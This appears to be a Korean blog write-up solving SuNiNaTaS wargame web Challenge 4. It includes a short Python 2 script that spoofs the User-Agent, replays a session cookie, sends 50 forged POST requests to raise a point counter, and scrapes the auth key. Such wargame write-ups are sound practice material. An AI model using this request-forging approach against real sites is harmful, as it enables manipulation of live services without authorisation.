티스토리 뷰

Wargame/SuNiNaTaS

Challenge 4 (Web)

do9dark 2015. 12. 19. 17:15

User-Agent, Point가 표시되어 있다.


Plus를 누르면 Point가 1씩 증가하는 것을 볼 수 있다.


개발자 도구를 이용해서 코드를 보면 <!-- Hint: Make your point to 50 & 'SuNiNaTaS' -->가 있다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/python
# -*- coding: utf-8 -*-
# do9dark
 
import httplib
import sys
 
sys.stdout.write('[-]Try: ')
for i in range(0,50):
    sys.stdout.write(str(i+1)+' ')
    host = 'suninatas.com'
    url = '/Part_one/web04/web04_ck.asp'
    message = 'total='+str(i+1)
    conn = httplib.HTTPConnection(host)
    conn.putrequest('POST',url)
    conn.putheader('Cookie','ASPSESSIONIDASBDRCDD=FCJOLAOBEDLFOCAKCJKIHODO')
    conn.putheader('User-agent','SuNiNaTaS')
    conn.putheader('Content-length',"%d" % len(message))
    conn.endheaders()
    conn.send(message)
    data = conn.getresponse().read()
    conn.close()
 
host = 'suninatas.com'
url = '/Part_one/web04/web04.asp'
conn = httplib.HTTPConnection(host)
conn.putrequest('GET',url)
conn.putheader('Cookie','ASPSESSIONIDASBDRCDD=FCJOLAOBEDLFOCAKCJKIHODO')
conn.putheader('User-agent','SuNiNaTaS')
conn.endheaders()
data = conn.getresponse().read()
conn.close()
 
print '\n[-]Flag: ' + data[data.find('<b>Auth key</b></font></td>')+55:data.find('<b>Auth key</b></font></td>')+78]
cs


힌트에 나와있는 대로 User-agent는 "SuNiNaTas"로 해서 50번 Plus하고 Authkey를 읽어오면 문제를 풀 수 있다.

'Wargame > SuNiNaTaS' 카테고리의 다른 글

Challenge 6 (Web)  (0) 2015.12.22
Challenge 5 (Web)  (0) 2015.12.19
Challenge 3 (Web)  (0) 2015.12.19
Challenge 2 (Web)  (0) 2015.12.19
Challenge 1 (Web)  (0) 2015.12.19
댓글
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
링크
공지사항
Total
Today
Yesterday